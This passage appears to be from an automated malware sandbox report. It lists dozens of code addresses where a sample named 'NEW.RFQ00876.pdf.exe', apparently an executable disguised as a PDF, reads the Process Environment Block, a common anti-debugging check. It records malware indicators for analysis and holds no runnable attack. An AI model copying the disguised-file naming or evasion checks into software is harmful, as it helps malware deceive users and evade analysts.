                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E420 mov eax, dword ptr fs:[00000030h]15_2_0184E420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E420 mov eax, dword ptr fs:[00000030h]15_2_0184E420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A430 mov eax, dword ptr fs:[00000030h]15_2_0188A430
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184645D mov eax, dword ptr fs:[00000030h]15_2_0184645D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187245A mov eax, dword ptr fs:[00000030h]15_2_0187245A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DC460 mov ecx, dword ptr fs:[00000030h]15_2_018DC460
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187A470 mov eax, dword ptr fs:[00000030h]15_2_0187A470
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187A470 mov eax, dword ptr fs:[00000030h]15_2_0187A470
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187A470 mov eax, dword ptr fs:[00000030h]15_2_0187A470
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F678E mov eax, dword ptr fs:[00000030h]15_2_018F678E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018507AF mov eax, dword ptr fs:[00000030h]15_2_018507AF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185C7C0 mov eax, dword ptr fs:[00000030h]15_2_0185C7C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D07C3 mov eax, dword ptr fs:[00000030h]15_2_018D07C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018727ED mov eax, dword ptr fs:[00000030h]15_2_018727ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018727ED mov eax, dword ptr fs:[00000030h]15_2_018727ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018727ED mov eax, dword ptr fs:[00000030h]15_2_018727ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DE7E1 mov eax, dword ptr fs:[00000030h]15_2_018DE7E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018547FB mov eax, dword ptr fs:[00000030h]15_2_018547FB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018547FB mov eax, dword ptr fs:[00000030h]15_2_018547FB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C700 mov eax, dword ptr fs:[00000030h]15_2_0188C700
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850710 mov eax, dword ptr fs:[00000030h]15_2_01850710
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01880710 mov eax, dword ptr fs:[00000030h]15_2_01880710
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C720 mov eax, dword ptr fs:[00000030h]15_2_0188C720
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C720 mov eax, dword ptr fs:[00000030h]15_2_0188C720
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188273C mov eax, dword ptr fs:[00000030h]15_2_0188273C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188273C mov ecx, dword ptr fs:[00000030h]15_2_0188273C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188273C mov eax, dword ptr fs:[00000030h]15_2_0188273C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CC730 mov eax, dword ptr fs:[00000030h]15_2_018CC730
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188674D mov esi, dword ptr fs:[00000030h]15_2_0188674D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188674D mov eax, dword ptr fs:[00000030h]15_2_0188674D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188674D mov eax, dword ptr fs:[00000030h]15_2_0188674D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DE75D mov eax, dword ptr fs:[00000030h]15_2_018DE75D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850750 mov eax, dword ptr fs:[00000030h]15_2_01850750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D4755 mov eax, dword ptr fs:[00000030h]15_2_018D4755
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892750 mov eax, dword ptr fs:[00000030h]15_2_01892750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892750 mov eax, dword ptr fs:[00000030h]15_2_01892750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858770 mov eax, dword ptr fs:[00000030h]15_2_01858770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854690 mov eax, dword ptr fs:[00000030h]15_2_01854690
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854690 mov eax, dword ptr fs:[00000030h]15_2_01854690
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C6A6 mov eax, dword ptr fs:[00000030h]15_2_0188C6A6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018866B0 mov eax, dword ptr fs:[00000030h]15_2_018866B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A6C7 mov ebx, dword ptr fs:[00000030h]15_2_0188A6C7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A6C7 mov eax, dword ptr fs:[00000030h]15_2_0188A6C7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D06F1 mov eax, dword ptr fs:[00000030h]15_2_018D06F1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D06F1 mov eax, dword ptr fs:[00000030h]15_2_018D06F1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE609 mov eax, dword ptr fs:[00000030h]15_2_018CE609
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892619 mov eax, dword ptr fs:[00000030h]15_2_01892619
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E627 mov eax, dword ptr fs:[00000030h]15_2_0186E627
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01886620 mov eax, dword ptr fs:[00000030h]15_2_01886620
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888620 mov eax, dword ptr fs:[00000030h]15_2_01888620
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185262C mov eax, dword ptr fs:[00000030h]15_2_0185262C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186C640 mov eax, dword ptr fs:[00000030h]15_2_0186C640
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A660 mov eax, dword ptr fs:[00000030h]15_2_0188A660
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A660 mov eax, dword ptr fs:[00000030h]15_2_0188A660
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01882674 mov eax, dword ptr fs:[00000030h]15_2_01882674
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191866E mov eax, dword ptr fs:[00000030h]15_2_0191866E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191866E mov eax, dword ptr fs:[00000030h]15_2_0191866E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018509AD mov eax, dword ptr fs:[00000030h]15_2_018509AD
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018509AD mov eax, dword ptr fs:[00000030h]15_2_018509AD
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D89B3 mov esi, dword ptr fs:[00000030h]15_2_018D89B3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D89B3 mov eax, dword ptr fs:[00000030h]15_2_018D89B3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D89B3 mov eax, dword ptr fs:[00000030h]15_2_018D89B3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191A9D3 mov eax, dword ptr fs:[00000030h]15_2_0191A9D3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E69C0 mov eax, dword ptr fs:[00000030h]15_2_018E69C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A9D0 mov eax, dword ptr fs:[00000030h]15_2_0185A9D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A9D0 mov eax, dword ptr fs:[00000030h]15_2_0185A9D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A9D0 mov eax, dword ptr fs:[00000030h]15_2_0185A9D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A9D0 mov eax, dword ptr fs:[00000030h]15_2_0185A9D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A9D0 mov eax, dword ptr fs:[00000030h]15_2_0185A9D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A9D0 mov eax, dword ptr fs:[00000030h]15_2_0185A9D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018849D0 mov eax, dword ptr fs:[00000030h]15_2_018849D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DE9E0 mov eax, dword ptr fs:[00000030h]15_2_018DE9E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018829F9 mov eax, dword ptr fs:[00000030h]15_2_018829F9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018829F9 mov eax, dword ptr fs:[00000030h]15_2_018829F9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE908 mov eax, dword ptr fs:[00000030h]15_2_018CE908
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE908 mov eax, dword ptr fs:[00000030h]15_2_018CE908
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01848918 mov eax, dword ptr fs:[00000030h]15_2_01848918
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01848918 mov eax, dword ptr fs:[00000030h]15_2_01848918
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DC912 mov eax, dword ptr fs:[00000030h]15_2_018DC912
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E892B mov eax, dword ptr fs:[00000030h]15_2_018E892B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D892A mov eax, dword ptr fs:[00000030h]15_2_018D892A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D0946 mov eax, dword ptr fs:[00000030h]15_2_018D0946
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01876962 mov eax, dword ptr fs:[00000030h]15_2_01876962
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01876962 mov eax, dword ptr fs:[00000030h]15_2_01876962
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01876962 mov eax, dword ptr fs:[00000030h]15_2_01876962
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189096E mov eax, dword ptr fs:[00000030h]15_2_0189096E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189096E mov edx, dword ptr fs:[00000030h]15_2_0189096E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189096E mov eax, dword ptr fs:[00000030h]15_2_0189096E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DC97C mov eax, dword ptr fs:[00000030h]15_2_018DC97C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F4978 mov eax, dword ptr fs:[00000030h]15_2_018F4978
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F4978 mov eax, dword ptr fs:[00000030h]15_2_018F4978
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850887 mov eax, dword ptr fs:[00000030h]15_2_01850887
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DC89D mov eax, dword ptr fs:[00000030h]15_2_018DC89D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E8C0 mov eax, dword ptr fs:[00000030h]15_2_0187E8C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C8F9 mov eax, dword ptr fs:[00000030h]15_2_0188C8F9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C8F9 mov eax, dword ptr fs:[00000030h]15_2_0188C8F9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191A8E4 mov eax, dword ptr fs:[00000030h]15_2_0191A8E4
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DC810 mov eax, dword ptr fs:[00000030h]15_2_018DC810
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872835 mov eax, dword ptr fs:[00000030h]15_2_01872835
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872835 mov eax, dword ptr fs:[00000030h]15_2_01872835
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872835 mov eax, dword ptr fs:[00000030h]15_2_01872835
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872835 mov ecx, dword ptr fs:[00000030h]15_2_01872835
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872835 mov eax, dword ptr fs:[00000030h]15_2_01872835
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872835 mov eax, dword ptr fs:[00000030h]15_2_01872835
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F483A mov eax, dword ptr fs:[00000030h]15_2_018F483A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F483A mov eax, dword ptr fs:[00000030h]15_2_018F483A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A830 mov eax, dword ptr fs:[00000030h]15_2_0188A830
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01862840 mov ecx, dword ptr fs:[00000030h]15_2_01862840
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854859 mov eax, dword ptr fs:[00000030h]15_2_01854859
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854859 mov eax, dword ptr fs:[00000030h]15_2_01854859
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01880854 mov eax, dword ptr fs:[00000030h]15_2_01880854
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E6870 mov eax, dword ptr fs:[00000030h]15_2_018E6870
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E6870 mov eax, dword ptr fs:[00000030h]15_2_018E6870
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DE872 mov eax, dword ptr fs:[00000030h]15_2_018DE872
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DE872 mov eax, dword ptr fs:[00000030h]15_2_018DE872
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860BBE mov eax, dword ptr fs:[00000030h]15_2_01860BBE
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860BBE mov eax, dword ptr fs:[00000030h]15_2_01860BBE
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850BCD mov eax, dword ptr fs:[00000030h]15_2_01850BCD
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850BCD mov eax, dword ptr fs:[00000030h]15_2_01850BCD
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850BCD mov eax, dword ptr fs:[00000030h]15_2_01850BCD
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01870BCB mov eax, dword ptr fs:[00000030h]15_2_01870BCB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01870BCB mov eax, dword ptr fs:[00000030h]15_2_01870BCB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01870BCB mov eax, dword ptr fs:[00000030h]15_2_01870BCB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FEBD0 mov eax, dword ptr fs:[00000030h]15_2_018FEBD0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858BF0 mov eax, dword ptr fs:[00000030h]15_2_01858BF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858BF0 mov eax, dword ptr fs:[00000030h]15_2_01858BF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858BF0 mov eax, dword ptr fs:[00000030h]15_2_01858BF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187EBFC mov eax, dword ptr fs:[00000030h]15_2_0187EBFC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DCBF0 mov eax, dword ptr fs:[00000030h]15_2_018DCBF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CEB1D mov eax, dword ptr fs:[00000030h]15_2_018CEB1D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187EB20 mov eax, dword ptr fs:[00000030h]15_2_0187EB20
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187EB20 mov eax, dword ptr fs:[00000030h]15_2_0187EB20
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01918B28 mov eax, dword ptr fs:[00000030h]15_2_01918B28
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01918B28 mov eax, dword ptr fs:[00000030h]15_2_01918B28
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F8B42 mov eax, dword ptr fs:[00000030h]15_2_018F8B42
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E6B40 mov eax, dword ptr fs:[00000030h]15_2_018E6B40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E6B40 mov eax, dword ptr fs:[00000030h]15_2_018E6B40
